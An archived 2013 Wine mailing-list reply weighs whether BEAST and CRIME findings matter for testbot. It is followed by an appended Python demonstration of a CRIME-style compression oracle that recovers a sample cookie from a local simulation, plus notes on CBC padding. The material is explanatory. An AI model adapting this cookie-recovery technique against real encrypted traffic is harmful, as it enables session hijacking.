[website] Are we doing something wrong with our secure connections?

Juan Lang juan.lang at gmail.com
Wed Jan 2 13:49:31 CST 2013


Hi André,


On Wed, Jan 2, 2013 at 8:08 AM, André Hentschel <nerv at dawncrow.de> wrote:

> Hi,
> FWIW I have just seen:
>
>
> https://www.ssllabs.com/ssltest/analyze.html?d=testbot.winehq.org&hideResults=on
>
> https://www.ssllabs.com/ssltest/analyze.html?d=test.winehq.org&hideResults=on
>
> https://www.ssllabs.com/ssltest/analyze.html?d=winehq.org&hideResults=on&ignoreMismatch=on
>
> which tells me we have some problems with secure website connection, the
> question is, do we need more security here?
>

The answer is, no.

More reasoning: in general, I don't think we're relying on any
confidentiality in the patches we submit to testbot: anyone can connect and
see the patches, as well as their test results. So no, I don't think
problems with TLS on testbot are a concern, now or ever.

And in particular: the Qualys scan tells us that the cert we're using is
vulnerable to the BEAST attack, and that the server is vulnerable to the
CRIME attack. The BEAST and CRIME attacks can allow an attacker to learn
the plaintext of a stable piece of ciphertext sent in many connections,
e.g. an authentication cookie, without having learned the server's private
key. In testbot's case, we do use cookie-based authentication after initial
login, but at worst that'd allow an attacker to submit jobs as one of us
developers, or cancel one of our test jobs, change our password, etc. I
don't think this is much of a concern.
--Juan
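The cookie-recovery attack described in the reply above, as an added worked example that is not code from this thread or from the Wine project: a CRIME-style compression side channel. The attacker controls part of a request (here the URL path), the browser appends a cookie the attacker cannot read, and the whole request is compressed before it is encrypted, so the ciphertext length reveals how much of the attacker's guess matched the cookie. The cookie name WineTestBotSession, its value, the host name www.example.org and the request layout are all constructed for the demonstration. The simulated compressor is pinned to zlib's fixed Huffman codes so that the one-byte signal is deterministic; real TLS compression used dynamic codes, where the saving sometimes rounds to zero bytes and the attacker has to re-pad and retry, which is why the recovery routine treats a tie as a stop condition rather than guessing.

```python
"""CRIME-style compression oracle against a stable cookie value.

Added example, not code from the wine-devel thread or the Wine project.
The cookie name, value, host and request layout are constructed.
"""
import string
import zlib

# Constructed sample secret: the authentication cookie the attacker wants.
COOKIE_NAME = "WineTestBotSession"            # assumed name, not a real one
SECRET_COOKIE = COOKIE_NAME + "=7f3a9c2b1e"   # constructed value
CHARSET = string.ascii_lowercase + string.digits


def compressed_length(attacker_path: str, secret: str = SECRET_COOKIE) -> int:
    """Model the attacker's view of one request.

    The attacker chooses the path (e.g. from a script in another tab), the
    browser appends the cookie it will not reveal, and the connection
    compresses the plaintext before encrypting it. With a stream cipher
    the record length equals the compressed length, which is all the
    attacker gets to observe.
    """
    request = (
        f"GET /{attacker_path} HTTP/1.1\r\n"
        f"Host: www.example.org\r\n"
        f"Cookie: {secret}\r\n\r\n"
    ).encode()
    # Assumption for a deterministic demo: fixed Huffman codes (Z_FIXED)
    # make every wrong guess cost exactly one extra 8-bit literal, so the
    # correct guess is always exactly one byte shorter. Real TLS used
    # dynamic codes, where the difference can round away.
    comp = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(comp.compress(request) + comp.flush())


def recover_cookie(known_prefix: str, oracle=compressed_length):
    """Extend a known prefix (here the cookie name and '=') one byte at a time.

    DEFLATE encodes the cookie as a back-reference to the attacker's copy
    in the path. Only the correct guess lengthens that back-reference, so
    its request compresses shorter than every wrong guess. When no guess
    wins (all lengths tie) the end of the value has been reached, or the
    signal was lost to rounding. Returns (recovered, oracle_queries).
    """
    recovered, queries = known_prefix, 0
    while True:
        lengths = {}
        for c in CHARSET:
            lengths[c] = oracle(recovered + c)
            queries += 1
        best = min(lengths.values())
        winners = [c for c, n in lengths.items() if n == best]
        if len(winners) != 1:
            return recovered, queries
        recovered += winners[0]


if __name__ == "__main__":
    cookie, n = recover_cookie(COOKIE_NAME + "=")
    print(f"recovered {cookie!r} after {n} length observations")
```

The oracle here models the stream-cipher case, where the ciphertext length is the compressed length. Under a CBC block cipher the record is padded to the block size, so the attacker first pads the controlled part of the request until the length sits on a block boundary and a single saved byte changes the number of blocks. Note also what the code does not need: the server's private key never appears, which is the point Juan makes above.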